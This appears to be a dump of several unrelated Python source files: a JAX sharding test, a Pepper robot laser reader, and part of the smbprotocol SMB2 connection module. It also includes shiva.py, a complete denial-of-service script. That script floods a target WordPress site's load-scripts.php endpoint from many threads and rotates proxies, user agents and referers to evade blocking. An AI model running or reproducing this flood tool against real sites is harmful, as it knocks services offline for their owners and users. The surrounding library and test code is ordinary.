dims = 5
aval = jax.core.ShapedArray((len(devices),) * dims, jnp.float32)
def roundtrip(spec):
op_sharding = pjit_lib.get_aval_sharding_proto(aval, spec, mesh)
parsed_spec = pjit_lib.parse_op_sharding(op_sharding, mesh).partitions
self.assertEqual(parsed_spec[:len(spec)], spec)
self.assertEqual(parsed_spec[len(spec):], ((),) * (len(parsed_spec) - len(spec)))
special_specs = [P()]
for spec in special_specs:
roundtrip(spec)
rng = self.rng()
for i in range(100):
spec = [()] * dims
for axis in rng.permutation(mesh_axes)[:rng.randint(low=1, high=len(mesh_axes) + 1)]:
spec[rng.choice(dims)] += (axis,)
roundtrip(P(*spec))
@parameterized.named_parameters(
("linear", {'x': 0, 'y': 1, 'z': 2}, P(('x',), ('y',), ('z',))),
("combine", {'x': 0, 'y': 0, 'z': 1}, P(('x', 'y'), ('z',))),
("skip", {'x': 0, 'y': 0, 'z': 2}, P(('x', 'y'), None, ('z',))),
("multi_skip", {'x': 0, 'y': 1, 'z': 3}, P(('x',), ('y',), None, ('z',))),
)
def test_array_mapping_to_axis_resources(self, inp, expected_out):
# Converts a {mesh_axis: positional_dim} mapping back to a PartitionSpec:
# mesh axes sharing a dim are grouped into one tuple entry, and positional
# dims with no mesh axis become None entries ("skip"/"multi_skip" cases).
self.assertEqual(pxla.array_mapping_to_axis_resources(inp), expected_out)
def test_get_input_metadata_fully_replicated(self):
# For fully replicated avals, _get_input_metadata should give every local
# device the full-array index: a (slice(None),) * ndim tuple per aval.
global_mesh = jtu.create_global_mesh((2, 2), ('x', 'y'))
global_in_aval1 = jax.core.ShapedArray((4, 4), jnp.int32)
global_in_aval2 = jax.core.ShapedArray((4, 4, 4), jnp.int32)
global_in_aval3 = jax.core.ShapedArray((), jnp.int32)
in_avals = [global_in_aval1, global_in_aval2, global_in_aval3]
# Empty axis-resource dicts ({}) mean no dimension is mapped to a mesh axis.
_, out_indices, _ = pxla._get_input_metadata(
in_avals, global_mesh, [{}, {}, {}], [False, False, False])
self.assertLen(out_indices, len(in_avals))
# One index entry per local device for each aval.
self.assertTrue(all(len(out) == len(global_mesh.local_devices)
for out in out_indices))
# Each per-device index has one slice per array dimension...
self.assertTrue(all(len(i) == aval.ndim
for out, aval in safe_zip(out_indices, in_avals) for i in out))
# ...and every slice is the trivial full slice.
self.assertTrue(all(i == (slice(None),) * aval.ndim
for out, aval in safe_zip(out_indices, in_avals) for i in out))
if __name__ == '__main__':
absltest.main(testLoader=jtu.JaxTestLoader())
|
shiva.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import threading
import requests
import proxify
import random
import argparse
import sys
requests.packages.urllib3.disable_warnings()
# Just some colors and shit
white = '\x1b[1;97m'
green = '\x1b[1;32m'
red = '\x1b[1;31m'
red = '\x1b[31m'
yellow = '\x1b[1;33m'
end = '\x1b[1;m'
info = '\x1b[1;33m[!]\x1b[1;m'
que = '\x1b[1;34m[?]\x1b[1;m'
bad = '\x1b[1;31m[-]\x1b[1;m'
good = '\x1b[1;32m[+]\x1b[1;m'
run = '\x1b[1;97m[~]\x1b[1;m'
parser = argparse.ArgumentParser()
parser.add_argument("-u", help="target website", dest='target')
parser.add_argument("-t", help="number of threads", dest='n', type=int)
args = parser.parse_args()
print ('''
%s██████ ██░ ██ ██▓ ██▒ █▓ ▄▄▄
▒██ ▒ ▓██░ ██▒▓██▒▓██░ █▒▒████▄
░ ▓██▄ ▒██▀▀██░▒██▒ ▓██ █▒░▒██ ▀█▄
▒ ██▒░▓█ ░██ ░██░ ▒██ █░░░██▄▄▄▄██
▒██████▒▒░▓█▒░██▓░██░ ▒▀█░ ▓█ ▓██▒
▒ ▒▓▒ ▒ ░ ▒ ░░▒░▒░▓ ░ ▐░ ▒▒ ▓▒█░
░ ░▒ ░ ░ ▒ ░▒░ ░ ▒ ░ ░ ░░ ▒ ▒▒ ░
░ ░ ░ ░ ░░ ░ ▒ ░ ░░ ░ ▒
░ ░ ░ ░ ░ ░ ░ ░
░ %s''' % (red, end))
if not args.target or not args.n:
parser.print_help()
quit()
if 'http' not in args.target:
target = 'http://' + args.target
else:
target = args.target
n = args.n
user_agents = ['Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36 OPR/43.0.2442.991',
'Mozilla/5.0 (Linux; U; Android 4.2.2; en-us; A1-810 Build/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30',
'Mozilla/5.0 (Windows NT 5.1; rv:52.0) Gecko/20100101 Firefox/52.0',
'Mozilla/5.0 (PLAYSTATION 3 4.81) AppleWebKit/531.22.8 (KHTML, like Gecko)',
'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36 OPR/48.0.2685.52',
'Mozilla/5.0 (SMART-TV; X11; Linux armv7l) AppleWebKit/537.42 (KHTML, like Gecko) Chromium/25.0.1349.2 Chrome/25.0.1349.2 Safari/537.42',
'Mozilla/5.0 (Windows NT 6.0; WOW64; Trident/7.0; rv:11.0) like Gecko',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/601.2.7 (KHTML, like Gecko)',
'Mozilla/5.0 (PlayStation 4 5.01) AppleWebKit/601.2 (KHTML, like Gecko)',]
path = '''/wp-admin/load-scripts.php?c=1&load[]=eutil,common,wp-a11y,sack,quicktag,colorpicker,editor,wp-fullscreen-stu,wp-ajax-response,
wp-api-request,wp-pointer,autosave,heartbeat,wp-auth-check,wp-lists,prototype,scriptaculous-root,scriptaculous-builder,scriptaculous-dragdrop,
scriptaculous-effects,scriptaculous-slider,scriptaculous-sound,scriptaculous-controls,scriptaculous,cropper,jquery,jquery-core,jquery-migrate,
jquery-ui-core,jquery-effects-core,jquery-effects-blind,jquery-effects-bounce,jquery-effects-clip,jquery-effects-drop,jquery-effects-explode,
jquery-effects-fade,jquery-effects-fold,jquery-effects-highlight,jquery-effects-puff,jquery-effects-pulsate,jquery-effects-scale,jquery-effects-shake,
jquery-effects-size,jquery-effects-slide,jquery-effects-transfer,jquery-ui-accordion,jquery-ui-autocomplete,jquery-ui-button,jquery-ui-datepicker,
jquery-ui-dialog,jquery-ui-draggable,jquery-ui-droppable,jquery-ui-menu,jquery-ui-mouse,jquery-ui-position,jquery-ui-progressbar,jquery-ui-resizable,
jquery-ui-selectable,jquery-ui-selectmenu,jquery-ui-slider,jquery-ui-sortable,jquery-ui-spinner,jquery-ui-tabs,jquery-ui-tooltip,jquery-ui-widget,
jquery-form,jquery-color,schedule,jquery-query,jquery-serialize-object,jquery-hotkeys,jquery-table-hotkeys,jquery-touch-punch,suggest,imagesloaded,
masonry,jquery-masonry,thickbox,jcrop,swfobject,moxiejs,plupload,plupload-handlers,wp-plupload,swfupload,swfupload-all,swfupload-handlers,comment-repl,
json2,underscore,backbone,wp-util,wp-sanitize,wp-backbone,revisions,imgareaselect,mediaelement,mediaelement-core,mediaelement-migrat,mediaelement-vimeo,
wp-mediaelement,wp-codemirror,csslint,jshint,esprima,jsonlint,htmlhint,htmlhint-kses,code-editor,wp-theme-plugin-editor,wp-playlist,zxcvbn-async,
password-strength-meter,user-profile,language-chooser,user-suggest,admin-ba,wplink,wpdialogs,word-coun,media-upload,hoverIntent,customize-base,
customize-loader,customize-preview,customize-models,customize-views,customize-controls,customize-selective-refresh,customize-widgets,
customize-preview-widgets,customize-nav-menus,customize-preview-nav-menus,wp-custom-header,accordion,shortcode,media-models,wp-embe,media-views,
media-editor,media-audiovideo,mce-view,wp-api,admin-tags,admin-comments,xfn,postbox,tags-box,tags-suggest,post,editor-expand,link,comment,
admin-gallery,admin-widgets,media-widgets,media-audio-widget,media-image-widget,media-gallery-widget,media-video-widget,text-widgets,custom-html-widgets,
theme,inline-edit-post,inline-edit-tax,plugin-install,updates,farbtastic,iris,wp-color-picker,dashboard,list-revision,media-grid,media,image-edit,set-post-thumbnail,
nav-menu,custom-header,custom-background,media-gallery,svg-painter&ver=4.9.1'''
referers = ['http://www.usatoday.com/search/results?q=', 'http://engadget.search.aol.com/search?q=', 'http://www.google.com/?q=', 'http://engadget.search.aol.com/search?q=',
'http://www.bing.com/search?q=', 'http://search.yahoo.com/search?p=', 'http://www.ask.com/web?q=', 'http://boorow.com/Pages/site_br_aspx?query=',
'http://search.lycos.com/web/?q=', 'http://busca.uol.com.br/web/?q=', 'http://us.yhs4.search.yahoo.com/yhs/search?p=',
'http://www.dmoz.org/search/search?q=', 'http://www.baidu.com.br/s?usm=1&rn=100&wd=', 'http://yandex.ru/yandsearch?text=', 'http://www.zhongsou.com/third?w=',
'http://hksearch.timway.com/search.php?query=', 'http://find.ezilon.com/search.php?q=', 'http://www.sogou.com/web?query=', 'http://api.duckduckgo.com/html/?q=']
progress = []
turns = 0
proxies = proxify.many()
def attack():
global proxies, turns
for x in range(1, 9999):
try:
proxy_o = random.choice(proxies)
if 'https' in proxy_o:
proxy = {'https': proxy_o}
else:
proxy = {'http': proxy_o}
headers = {'User-Agent': random.choice(user_agents), 'Connection': 'keep-alive',
'Keep-Alive': str(random.choice(range(110,120))), 'Referer': random.choice(referers)}
requests.get(target + path, verify=False, stream=True, proxies=proxy).text
sys.stdout.write('\r%s Requests sent: %i' % (run, len(progress)))
sys.stdout.flush()
progress.append(0)
turns = turns + 1
if turns > n:
turns = turns - n
del proxies[:]
proxies = proxify.many()
except:
pass
threads = []
for i in range(1, n):
task = threading.Thread(target=attack, args=())
threads.append(task)
for thread in threads:
thread.start()
for thread in threads:
thread.join()
|
getlaser.py | #http://doc.aldebaran.com/2-5/naoqi/core/almemory-api.html
#http://doc.aldebaran.com/2-5/family/pepper_technical/pepper_dcm/actuator_sensor_names.html#ju-lasers
import qi
import argparse
import sys
import time
import threading
import os
laserValueList = [
# RIGHT LASER
"Device/SubDeviceList/Platform/LaserSensor/Right/Horizontal/Seg01/X/Sensor/Value",
"Device/SubDeviceList/Platform/LaserSensor/Right/Horizontal/Seg01/Y/Sensor/Value",
"Device/SubDeviceList/Platform/LaserSensor/Right/Horizontal/Seg02/X/Sensor/Value",
"Device/SubDeviceList/Platform/LaserSensor/Right/Horizontal/Seg02/Y/Sensor/Value",
"Device/SubDeviceList/Platform/LaserSensor/Right/Horizontal/Seg03/X/Sensor/Value",
"Device/SubDeviceList/Platform/LaserSensor/Right/Horizontal/Seg03/Y/Sensor/Value",
"Device/SubDeviceList/Platform/LaserSensor/Right/Horizontal/Seg04/X/Sensor/Value",
"Device/SubDeviceList/Platform/LaserSensor/Right/Horizontal/Seg04/Y/Sensor/Value",
"Device/SubDeviceList/Platform/LaserSensor/Right/Horizontal/Seg05/X/Sensor/Value",
"Device/SubDeviceList/Platform/LaserSensor/Right/Horizontal/Seg05/Y/Sensor/Value",
"Device/SubDeviceList/Platform/LaserSensor/Right/Horizontal/Seg06/X/Sensor/Value",
"Device/SubDeviceList/Platform/LaserSensor/Right/Horizontal/Seg06/Y/Sensor/Value",
"Device/SubDeviceList/Platform/LaserSensor/Right/Horizontal/Seg07/X/Sensor/Value",
"Device/SubDeviceList/Platform/LaserSensor/Right/Horizontal/Seg07/Y/Sensor/Value",
"Device/SubDeviceList/Platform/LaserSensor/Right/Horizontal/Seg08/X/Sensor/Value",
"Device/SubDeviceList/Platform/LaserSensor/Right/Horizontal/Seg08/Y/Sensor/Value",
"Device/SubDeviceList/Platform/LaserSensor/Right/Horizontal/Seg09/X/Sensor/Value",
"Device/SubDeviceList/Platform/LaserSensor/Right/Horizontal/Seg09/Y/Sensor/Value",
"Device/SubDeviceList/Platform/LaserSensor/Right/Horizontal/Seg10/X/Sensor/Value",
"Device/SubDeviceList/Platform/LaserSensor/Right/Horizontal/Seg10/Y/Sensor/Value",
"Device/SubDeviceList/Platform/LaserSensor/Right/Horizontal/Seg11/X/Sensor/Value",
"Device/SubDeviceList/Platform/LaserSensor/Right/Horizontal/Seg11/Y/Sensor/Value",
"Device/SubDeviceList/Platform/LaserSensor/Right/Horizontal/Seg12/X/Sensor/Value",
"Device/SubDeviceList/Platform/LaserSensor/Right/Horizontal/Seg12/Y/Sensor/Value",
"Device/SubDeviceList/Platform/LaserSensor/Right/Horizontal/Seg13/X/Sensor/Value",
"Device/SubDeviceList/Platform/LaserSensor/Right/Horizontal/Seg13/Y/Sensor/Value",
"Device/SubDeviceList/Platform/LaserSensor/Right/Horizontal/Seg14/X/Sensor/Value",
"Device/SubDeviceList/Platform/LaserSensor/Right/Horizontal/Seg14/Y/Sensor/Value",
"Device/SubDeviceList/Platform/LaserSensor/Right/Horizontal/Seg15/X/Sensor/Value",
"Device/SubDeviceList/Platform/LaserSensor/Right/Horizontal/Seg15/Y/Sensor/Value",
# FRONT LASER
"Device/SubDeviceList/Platform/LaserSensor/Front/Horizontal/Seg01/X/Sensor/Value",
"Device/SubDeviceList/Platform/LaserSensor/Front/Horizontal/Seg01/Y/Sensor/Value",
"Device/SubDeviceList/Platform/LaserSensor/Front/Horizontal/Seg02/X/Sensor/Value",
"Device/SubDeviceList/Platform/LaserSensor/Front/Horizontal/Seg02/Y/Sensor/Value",
"Device/SubDeviceList/Platform/LaserSensor/Front/Horizontal/Seg03/X/Sensor/Value",
"Device/SubDeviceList/Platform/LaserSensor/Front/Horizontal/Seg03/Y/Sensor/Value",
"Device/SubDeviceList/Platform/LaserSensor/Front/Horizontal/Seg04/X/Sensor/Value",
"Device/SubDeviceList/Platform/LaserSensor/Front/Horizontal/Seg04/Y/Sensor/Value",
"Device/SubDeviceList/Platform/LaserSensor/Front/Horizontal/Seg05/X/Sensor/Value",
"Device/SubDeviceList/Platform/LaserSensor/Front/Horizontal/Seg05/Y/Sensor/Value",
"Device/SubDeviceList/Platform/LaserSensor/Front/Horizontal/Seg06/X/Sensor/Value",
"Device/SubDeviceList/Platform/LaserSensor/Front/Horizontal/Seg06/Y/Sensor/Value",
"Device/SubDeviceList/Platform/LaserSensor/Front/Horizontal/Seg07/X/Sensor/Value",
"Device/SubDeviceList/Platform/LaserSensor/Front/Horizontal/Seg07/Y/Sensor/Value",
"Device/SubDeviceList/Platform/LaserSensor/Front/Horizontal/Seg08/X/Sensor/Value",
"Device/SubDeviceList/Platform/LaserSensor/Front/Horizontal/Seg08/Y/Sensor/Value",
"Device/SubDeviceList/Platform/LaserSensor/Front/Horizontal/Seg09/X/Sensor/Value",
"Device/SubDeviceList/Platform/LaserSensor/Front/Horizontal/Seg09/Y/Sensor/Value",
"Device/SubDeviceList/Platform/LaserSensor/Front/Horizontal/Seg10/X/Sensor/Value",
"Device/SubDeviceList/Platform/LaserSensor/Front/Horizontal/Seg10/Y/Sensor/Value",
"Device/SubDeviceList/Platform/LaserSensor/Front/Horizontal/Seg11/X/Sensor/Value",
"Device/SubDeviceList/Platform/LaserSensor/Front/Horizontal/Seg11/Y/Sensor/Value",
"Device/SubDeviceList/Platform/LaserSensor/Front/Horizontal/Seg12/X/Sensor/Value",
"Device/SubDeviceList/Platform/LaserSensor/Front/Horizontal/Seg12/Y/Sensor/Value",
"Device/SubDeviceList/Platform/LaserSensor/Front/Horizontal/Seg13/X/Sensor/Value",
"Device/SubDeviceList/Platform/LaserSensor/Front/Horizontal/Seg13/Y/Sensor/Value",
"Device/SubDeviceList/Platform/LaserSensor/Front/Horizontal/Seg14/X/Sensor/Value",
"Device/SubDeviceList/Platform/LaserSensor/Front/Horizontal/Seg14/Y/Sensor/Value",
"Device/SubDeviceList/Platform/LaserSensor/Front/Horizontal/Seg15/X/Sensor/Value",
"Device/SubDeviceList/Platform/LaserSensor/Front/Horizontal/Seg15/Y/Sensor/Value",
# LEFT LASER
"Device/SubDeviceList/Platform/LaserSensor/Left/Horizontal/Seg01/X/Sensor/Value",
"Device/SubDeviceList/Platform/LaserSensor/Left/Horizontal/Seg01/Y/Sensor/Value",
"Device/SubDeviceList/Platform/LaserSensor/Left/Horizontal/Seg02/X/Sensor/Value",
"Device/SubDeviceList/Platform/LaserSensor/Left/Horizontal/Seg02/Y/Sensor/Value",
"Device/SubDeviceList/Platform/LaserSensor/Left/Horizontal/Seg03/X/Sensor/Value",
"Device/SubDeviceList/Platform/LaserSensor/Left/Horizontal/Seg03/Y/Sensor/Value",
"Device/SubDeviceList/Platform/LaserSensor/Left/Horizontal/Seg04/X/Sensor/Value",
"Device/SubDeviceList/Platform/LaserSensor/Left/Horizontal/Seg04/Y/Sensor/Value",
"Device/SubDeviceList/Platform/LaserSensor/Left/Horizontal/Seg05/X/Sensor/Value",
"Device/SubDeviceList/Platform/LaserSensor/Left/Horizontal/Seg05/Y/Sensor/Value",
"Device/SubDeviceList/Platform/LaserSensor/Left/Horizontal/Seg06/X/Sensor/Value",
"Device/SubDeviceList/Platform/LaserSensor/Left/Horizontal/Seg06/Y/Sensor/Value",
"Device/SubDeviceList/Platform/LaserSensor/Left/Horizontal/Seg07/X/Sensor/Value",
"Device/SubDeviceList/Platform/LaserSensor/Left/Horizontal/Seg07/Y/Sensor/Value",
"Device/SubDeviceList/Platform/LaserSensor/Left/Horizontal/Seg08/X/Sensor/Value",
"Device/SubDeviceList/Platform/LaserSensor/Left/Horizontal/Seg08/Y/Sensor/Value",
"Device/SubDeviceList/Platform/LaserSensor/Left/Horizontal/Seg09/X/Sensor/Value",
"Device/SubDeviceList/Platform/LaserSensor/Left/Horizontal/Seg09/Y/Sensor/Value",
"Device/SubDeviceList/Platform/LaserSensor/Left/Horizontal/Seg10/X/Sensor/Value",
"Device/SubDeviceList/Platform/LaserSensor/Left/Horizontal/Seg10/Y/Sensor/Value",
"Device/SubDeviceList/Platform/LaserSensor/Left/Horizontal/Seg11/X/Sensor/Value",
"Device/SubDeviceList/Platform/LaserSensor/Left/Horizontal/Seg11/Y/Sensor/Value",
"Device/SubDeviceList/Platform/LaserSensor/Left/Horizontal/Seg12/X/Sensor/Value",
"Device/SubDeviceList/Platform/LaserSensor/Left/Horizontal/Seg12/Y/Sensor/Value",
"Device/SubDeviceList/Platform/LaserSensor/Left/Horizontal/Seg13/X/Sensor/Value",
"Device/SubDeviceList/Platform/LaserSensor/Left/Horizontal/Seg13/Y/Sensor/Value",
"Device/SubDeviceList/Platform/LaserSensor/Left/Horizontal/Seg14/X/Sensor/Value",
"Device/SubDeviceList/Platform/LaserSensor/Left/Horizontal/Seg14/Y/Sensor/Value",
"Device/SubDeviceList/Platform/LaserSensor/Left/Horizontal/Seg15/X/Sensor/Value",
"Device/SubDeviceList/Platform/LaserSensor/Left/Horizontal/Seg15/Y/Sensor/Value"
]
import threading
def rhMonitorThread (memory_service):
    """Poll ALMemory for the laser keys and print two of the values.

    Loops until the main thread sets this thread object's ``do_run``
    attribute to False (see main()).

    :param memory_service: ALMemory service proxy used for the batched read.
    """
    t = threading.currentThread()
    while getattr(t, "do_run", True):
        # One batched read of every key in laserValueList per iteration.
        laserValues = memory_service.getListData(laserValueList)
        # Indices 44/45 - presumably a single segment's X/Y pair; verify
        # against the ordering of laserValueList before relying on it.
        print laserValues[44],laserValues[45]
        time.sleep(0.1)
    print "Exiting Thread"
def main():
    """Connect to the robot's NAOqi session and stream laser sensor values.

    Parses --pip/--pport, connects a qi.Application, starts a monitor
    thread that polls ALMemory, then blocks in app.run() until stopped;
    on exit the monitor thread is asked to stop via its do_run flag.
    """
    parser = argparse.ArgumentParser()
    # Falls back to the PEPPER_IP environment variable; raises KeyError if
    # it is unset and --pip is not given.
    parser.add_argument("--pip", type=str, default=os.environ['PEPPER_IP'],
                        help="Robot IP address. On robot or Local Naoqi: use '127.0.0.1'.")
    parser.add_argument("--pport", type=int, default=9559,
                        help="Naoqi port number")
    args = parser.parse_args()
    pip = args.pip
    pport = args.pport
    # Starting application
    try:
        connection_url = "tcp://" + pip + ":" + str(pport)
        app = qi.Application(["laserReader", "--qi-url=" + connection_url ])
    except RuntimeError:
        print ("Can't connect to Naoqi at ip \"" + pip + "\" on port " + str(pport) +".\n"
               "Please check your script arguments. Run with -h option for help.")
        sys.exit(1)
    app.start()
    session = app.session
    # Starting services
    memory_service = session.service("ALMemory")
    # Create a thread that monitors the laser values directly.
    monitorThread = threading.Thread(target = rhMonitorThread, args = (memory_service,))
    monitorThread.start()
    # Program stays at this point until we stop it.
    app.run()
    # Signal the monitor loop (checked via getattr in rhMonitorThread).
    monitorThread.do_run = False
    print "Finished"
# Script entry point.
if __name__ == "__main__":
    main()
|
connection.py | # -*- coding: utf-8 -*-
# Copyright: (c) 2019, Jordan Borean (@jborean93) <jborean93@gmail.com>
# MIT License (see LICENSE or https://opensource.org/licenses/MIT)
from __future__ import division
# Module-level counter, presumably rebound via ``global g_count`` by code
# later in this file - confirm against the callers.  A ``global`` statement
# at module scope is a no-op, so only the assignment is kept.
g_count = 0
import binascii
import functools
import hashlib
import hmac
import logging
import math
import os
import struct
import threading
import time

import smbprotocol.lznt1
from collections import (
OrderedDict,
)
from cryptography.exceptions import (
UnsupportedAlgorithm,
)
from cryptography.hazmat.backends import (
default_backend,
)
from cryptography.hazmat.primitives import (
cmac,
)
from cryptography.hazmat.primitives.ciphers import (
aead,
algorithms,
)
from datetime import (
datetime,
)
from threading import (
Lock,
)
from smbprotocol import (
Commands,
Dialects,
MAX_PAYLOAD_SIZE,
)
from smbprotocol._text import (
to_native,
to_text,
)
from smbprotocol.exceptions import (
NtStatus,
SMB2SymbolicLinkErrorResponse,
SMBException,
SMBResponseException,
)
from smbprotocol.open import (
Open,
)
from smbprotocol.structure import (
BytesField,
DateTimeField,
EnumField,
FlagField,
IntField,
ListField,
Structure,
StructureField,
UuidField,
)
from smbprotocol.transport import (
Tcp,
)
try:
from queue import Queue
except ImportError: # pragma: no cover
from Queue import Queue
log = logging.getLogger(__name__)
class Smb2Flags(object):
    """
    [MS-SMB2] v53.0 2017-09-15
    2.2.1.2 SMB2 Packet Header - SYNC Flags
    Indicates various processing rules that need to be done on the SMB2 packet.
    """
    # Set on messages sent by the server (responses).
    SMB2_FLAGS_SERVER_TO_REDIR = 0x00000001
    # Header is the ASYNC variant (carries async_id).
    SMB2_FLAGS_ASYNC_COMMAND = 0x00000002
    # Message is part of a related compound chain.
    SMB2_FLAGS_RELATED_OPERATIONS = 0x00000004
    # The signature field of the header is valid.
    SMB2_FLAGS_SIGNED = 0x00000008
    # Mask over the priority bits (SMB 3.1.1).
    SMB2_FLAGS_PRIORITY_MASK = 0x00000070
    SMB2_FLAGS_DFS_OPERATIONS = 0x10000000
    SMB2_FLAGS_REPLAY_OPERATIONS = 0x20000000
class SecurityMode(object):
    """
    [MS-SMB2] v53.0 2017-09-15
    2.2.3 SMB2 NEGOTIATE Request SecurityMode
    Indicates whether SMB signing is enabled or required by the client.
    """
    SMB2_NEGOTIATE_SIGNING_ENABLED = 0x0001
    SMB2_NEGOTIATE_SIGNING_REQUIRED = 0x0002
class Capabilities(object):
    """
    [MS-SMB2] v53.0 2017-09-15
    2.2.3 SMB2 NEGOTIATE Request Capabilities
    Used in SMB3.x and above, used to specify the capabilities supported.
    """
    SMB2_GLOBAL_CAP_DFS = 0x00000001
    SMB2_GLOBAL_CAP_LEASING = 0x00000002
    # Multi-credit (large MTU) support; see Connection.supports_multi_credit.
    SMB2_GLOBAL_CAP_LARGE_MTU = 0x00000004
    SMB2_GLOBAL_CAP_MULTI_CHANNEL = 0x00000008
    SMB2_GLOBAL_CAP_PERSISTENT_HANDLES = 0x00000010
    SMB2_GLOBAL_CAP_DIRECTORY_LEASING = 0x00000020
    SMB2_GLOBAL_CAP_ENCRYPTION = 0x00000040
class NegotiateContextType(object):
    """
    [MS-SMB2] v53.0 2017-09-15
    2.2.3.1 SMB2 NEGOTIATE_CONTENT Request ContextType
    Specifies the type of context in an SMB2 NEGOTIATE_CONTEXT message.
    """
    SMB2_PREAUTH_INTEGRITY_CAPABILITIES = 0x0001
    SMB2_ENCRYPTION_CAPABILITIES = 0x0002
    SMB2_COMPRESSION_CAPABILITIES = 0x0003
class HashAlgorithms(object):
    """
    [MS-SMB2] v53.0 2017-09-15
    2.2.3.1.1 SMB2_PREAUTH_INTEGRITY_CAPABILITIES
    16-bit integer IDs identifying the pre-auth integrity hash algorithms
    this client understands; get_algorithm maps an ID to its hashlib
    constructor.
    """
    SHA_512 = 0x0001

    @staticmethod
    def get_algorithm(hash):
        # Plain mapping lookup - raises KeyError for an unknown hash ID.
        known = {
            HashAlgorithms.SHA_512: hashlib.sha512,
        }
        return known[hash]
class Ciphers(object):
    """
    [MS-SMB2] v53.0 2017-09-15
    2.2.3.1.2 SMB2_ENCRYPTION_CAPABILITIES
    16-bit integer IDs identifying the encryption algorithms this client
    can negotiate, with helpers to resolve an ID to its AEAD implementation
    and to probe which ciphers the installed crypto backend supports.
    """
    AES_128_CCM = 0x0001
    AES_128_GCM = 0x0002

    @staticmethod
    def get_cipher(cipher):
        # Resolve a negotiated cipher ID to its AEAD class; an unknown ID
        # raises KeyError, matching a plain dict lookup.
        if cipher == Ciphers.AES_128_CCM:
            return aead.AESCCM
        elif cipher == Ciphers.AES_128_GCM:
            return aead.AESGCM
        raise KeyError(cipher)

    @staticmethod
    def get_supported_ciphers():
        # Probe each implementation with a dummy key; a backend without
        # support raises UnsupportedAlgorithm and the cipher is skipped.
        # GCM is listed first as the preferred cipher.
        supported_ciphers = []
        candidates = (
            (Ciphers.AES_128_GCM, aead.AESGCM),
            (Ciphers.AES_128_CCM, aead.AESCCM),
        )
        for cipher_id, cipher_cls in candidates:
            try:
                cipher_cls(b"\x00" * 16)
            except UnsupportedAlgorithm:  # pragma: no cover
                continue
            supported_ciphers.append(cipher_id)
        return supported_ciphers
class CompressionAlgos(object):
    """
    [MS-SMB2] v53.0 2017-09-15
    2.2.3.1.3 SMB2_COMPRESSION_CAPABILITIES
    16-bit integer IDs that specify the supported compression algorithms.
    """
    NONE = 0x0000
    LZNT1 = 0x0001
    LZ77 = 0x0002
    LZ77HUFFMAN = 0x0003

    @staticmethod
    def get_cipher(cipher):
        # NOTE(review): copy/paste leftover from Ciphers.get_cipher - it maps
        # *encryption* cipher IDs, not compression algorithm IDs.  Kept
        # unchanged so any existing caller keeps its current behaviour.
        return {
            Ciphers.AES_128_CCM: aead.AESCCM,
            Ciphers.AES_128_GCM: aead.AESGCM
        }[cipher]

    @staticmethod
    def get_supported_ciphers():
        """Return every compression algorithm ID this client advertises."""
        # All algorithms are advertised unconditionally; no runtime probing
        # is required (unlike Ciphers.get_supported_ciphers).
        return [
            CompressionAlgos.NONE,
            CompressionAlgos.LZNT1,
            CompressionAlgos.LZ77,
            CompressionAlgos.LZ77HUFFMAN,
        ]
class SMB2HeaderAsync(Structure):
    """
    [MS-SMB2] 2.2.1.1 SMB2 Packer Header - ASYNC
    https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-smb2/ea4560b7-90da-4803-82b5-344754b92a79
    The SMB2 Packet header for async commands.
    """
    def __init__(self):
        self.fields = OrderedDict([
            # b"\xfeSMB" marks a plain (non-transformed) SMB2 packet.
            ('protocol_id', BytesField(
                size=4,
                default=b"\xfeSMB",
            )),
            # Header size is fixed at 64 bytes.
            ('structure_size', IntField(
                size=2,
                default=64,
            )),
            ('credit_charge', IntField(size=2)),
            ('channel_sequence', IntField(size=2)),
            ('reserved', IntField(size=2)),
            ('command', EnumField(
                size=2,
                enum_type=Commands,
            )),
            ('credit_request', IntField(size=2)),
            ('flags', FlagField(
                size=4,
                flag_type=Smb2Flags,
            )),
            ('next_command', IntField(size=4)),
            ('message_id', IntField(size=8)),
            # The ASYNC header carries an 8-byte async_id where the SYNC
            # header has process_id/tree_id (see SMB2HeaderRequest).
            ('async_id', IntField(size=8)),
            ('session_id', IntField(size=8)),
            ('signature', BytesField(
                size=16,
                default=b"\x00" * 16,
            )),
            # Command payload following the header; not a spec field.
            ('data', BytesField())
        ])
        super(SMB2HeaderAsync, self).__init__()
class SMB2HeaderRequest(Structure):
    """
    [MS-SMB2] v53.0 2017-09-15
    2.2.1.2 SMB2 Packet Header - SYNC
    This is the header definition that contains the ChannelSequence/Reserved
    instead of the Status field used for a Packet request.
    """
    def __init__(self):
        self.fields = OrderedDict([
            # b"\xfeSMB" marks a plain (non-transformed) SMB2 packet.
            ('protocol_id', BytesField(
                size=4,
                default=b"\xfeSMB",
            )),
            # Header size is fixed at 64 bytes.
            ('structure_size', IntField(
                size=2,
                default=64,
            )),
            ('credit_charge', IntField(size=2)),
            ('channel_sequence', IntField(size=2)),
            ('reserved', IntField(size=2)),
            ('command', EnumField(
                size=2,
                enum_type=Commands
            )),
            ('credit_request', IntField(size=2)),
            ('flags', FlagField(
                size=4,
                flag_type=Smb2Flags,
            )),
            ('next_command', IntField(size=4)),
            ('message_id', IntField(size=8)),
            ('process_id', IntField(size=4)),
            ('tree_id', IntField(size=4)),
            ('session_id', IntField(size=8)),
            ('signature', BytesField(
                size=16,
                default=b"\x00" * 16,
            )),
            # Command payload following the header; not a spec field.
            ('data', BytesField())
        ])
        super(SMB2HeaderRequest, self).__init__()
class SMB2HeaderResponse(Structure):
    """
    [MS-SMB2] v53.0 2017-09-15
    2.2.1.2 SMB2 Packet Header - SYNC
    The header definition for an SMB Response that contains the Status field
    instead of the ChannelSequence/Reserved used for a Packet response.
    """
    def __init__(self):
        self.fields = OrderedDict([
            ('protocol_id', BytesField(
                size=4,
                default=b'\xfeSMB',
            )),
            ('structure_size', IntField(
                size=2,
                default=64,
            )),
            ('credit_charge', IntField(size=2)),
            # enum_strict=False: servers may return NT status codes that are
            # not in this client's NtStatus enumeration.
            ('status', EnumField(
                size=4,
                enum_type=NtStatus,
                enum_strict=False
            )),
            ('command', EnumField(
                size=2,
                enum_type=Commands,
                enum_strict=False,
            )),
            ('credit_response', IntField(size=2)),
